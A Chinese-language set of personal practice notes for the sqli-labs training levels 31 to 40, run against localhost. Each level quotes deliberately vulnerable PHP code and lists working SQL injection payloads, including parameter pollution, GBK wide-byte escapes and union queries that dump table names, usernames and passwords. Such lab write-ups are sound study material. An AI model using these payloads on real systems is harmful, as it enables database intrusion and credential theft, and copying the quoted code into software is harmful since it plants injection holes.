SQLI-LAB 的 实战记录(Less 31 - Less 40)

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。 因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 31 Protection with WAF

(第31节:用WAF防护 )

Test:

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=3

注:显示的是id为3的内容

Sourse Code:

$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
      echo 'Your Login name:'. $row['username'];
      echo 'Your Password:' .$row['password'];
} else{
    print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    } else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
     foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            break;
        }
    }
}

Solution:

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,2,3 --+

    其它:

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 32 Bypass addslashes()

(第32节:绕过 addslashes() )

Test:

    http://localhost/sqli-lab/Less-32/index.php?id='"\\--+

注:单引号,双引号,反斜杠 均被添加斜线

    http://localhost/sqli-lab/Less-32/index.php?id=�'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1 注:id周围是单引号

    http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+

注:将utf8的单引号转化成utf16的,可以通过 Decoder - Encoder: UTF8, UTF16, ...(需要FQ)

Sourse Code:

function check_addslashes($string){
     $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
     $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
     $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
     return $string;
}
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+

    其它:

    http://localhost/sqli-lab/Less-32/index.php?id=�' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

    http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 33 Bypass addslashes()

(第33节:绕过 addslashes() )

Test:

    http://localhost/sqli-lab/Less-33/index.php?id=�'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1 注:id周围是单引号

Sourse Code:

function check_addslashes($string){
     $string= addslashes($string);   
     return $string;
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-33/index.php?id=�' or 1=1 --+

    其它:

    http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,database(),version() --+

    http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

    http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 34 Bypass Add SLASHES

(第34节:绕过添加斜杠)

Test:

    http://localhost/sqli-lab/Less-34/index.php

注:编码为gbk的数据库+addslashes() 有一个关于编码的漏洞 加上斜杠以后的字符编码是%BF%5C%27和%FE%5C%27

Sourse Code:

$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
     echo '<img src="../images/flag.jpg"  />';   
}else{
     print_r(mysql_error());
     echo '<img src="../images/slap.jpg" />';   
}

Solution:

    uname=1%BF' or 1=1 #&passwd=1%BF' or 1=1 #&submit=Submit

    uname=1%FE' or 1=1 #&passwd=1%FE' or 1=1 #&submit=Submit

    其它:

    uname=1%Bf' union select version(),database() #&passwd=1%BF' or 1=1 #&submit=Submit

    uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit

    uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit

注:如果采用这种办法,还是一直报编码错误的话,建议自行检查 数据库 及 其中 表 的编码

Less - 35 why care for addslashes()

(第35节:为什么要关心addslashes())

Test:

http://localhost/sqli-lab/Less-35/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 0,1' at line 1 注:id周围没有单引号或双引号

Sourse Code:

function check_addslashes($string){
    $string = addslashes($string);
    return $string;
}
$id=check_addslashes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,2,3 #

    其它:

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,version(),database() #

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 #

Less - 36 Bypass MySQL Real Escape String

(第36节:绕过 MySQL_real_escape_string )

Test:

    http://localhost/sqli-lab/Less-36/index.php?id=%BF' or 1=1 #

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 注:id周围是单引号

Sourse Code:

function check_quotes($string){
    $string= mysql_real_escape_string($string);   
    return $string;
}
$id=check_quotes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' or 1=1%23

    其它:

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,version(),database()%23

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1%23

Less - 37 MySQL_real_escape_string

(第37节:MySQL_real_escape_string )

Test:

    http://localhost/sqli-lab/Less-38/index.php 
        uname=2'&passwd=1'&submit=Submit

注:失败,没有SQL查询报错

Sourse Code:

mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '<img src="../images/flag.jpg"  />';   
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';   
}

Solution:

    uname=2%FE' or 1=1  #&passwd=1%FE' or 1=1 #&submit=Submit

    其它:

    uname=1%FE' union select version(),database() #&passwd=1%FE' or 1=1 #&submit=Submit

    uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit

    uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit

Less - 38 stacked Query

(第38节: 层次化查询)

Test:

    http://localhost/sqli-lab/Less-38/index.php?id=1%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 注:id周围是单引号

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        if($row = mysqli_fetch_row($result)){  
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)){
    }
}else{
     print_r(mysqli_error($con1));
}

注:mysqli_more_results() 检查一个多重查询语句中是否有更多结果 Solution:

    http://localhost/sqli-lab/Less-38/index.php?id=2%FE' or 1=1 %23

    其它:

    http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,version(),database() %23

    http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

    http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

Less - 39 stacked Query Intiger type

(第39节:层次化查询 数字类型)

Test:

    http://localhost/sqli-lab/Less-39/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 注:数字型

Sourse Code:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
     if ($result = mysqli_store_result($con1)){
          if($row = mysqli_fetch_row($result)){
               printf("Your Username is : %s", $row[1]);
               printf("Your Password is : %s", $row[2]);
          }
     }
if (mysqli_more_results($con1)){
}
}else{
     print_r(mysqli_error($con1));
}

Solution:

    http://localhost/sqli-lab/Less-39/index.php?id=0 or 1=1 %23

    其它:

    http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,version(),database() %23

    http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

    http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

Less - 40 stacked Query String type Blind

(第40节:层次化查询 字符串类型 盲注)

Test:

    http://localhost/sqli-lab/Less-40/index.php?id=1

注:正常显示id为1的值

    http://localhost/sqli-lab/Less-40/index.php?id=1'

注:没有显示报错

    http://localhost/sqli-lab/Less-40/index.php?id=0' or 1=1 %23
    http://localhost/sqli-lab/Less-40/index.php?id=0') or 1=1 %23

注:正常显示id为1的值

Sourse Code:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)) {
    if ($result = mysqli_store_result($con1)) {
        if($row = mysqli_fetch_row($result)) {  
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)) {
    }
}

Solution:

    http://localhost/sqli-lab/Less-40/index.php?id=0%FE') or 1=1 %23

    其它:

    http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,version(),database() %23

    http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

    http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

results matching ""

    No results matching ""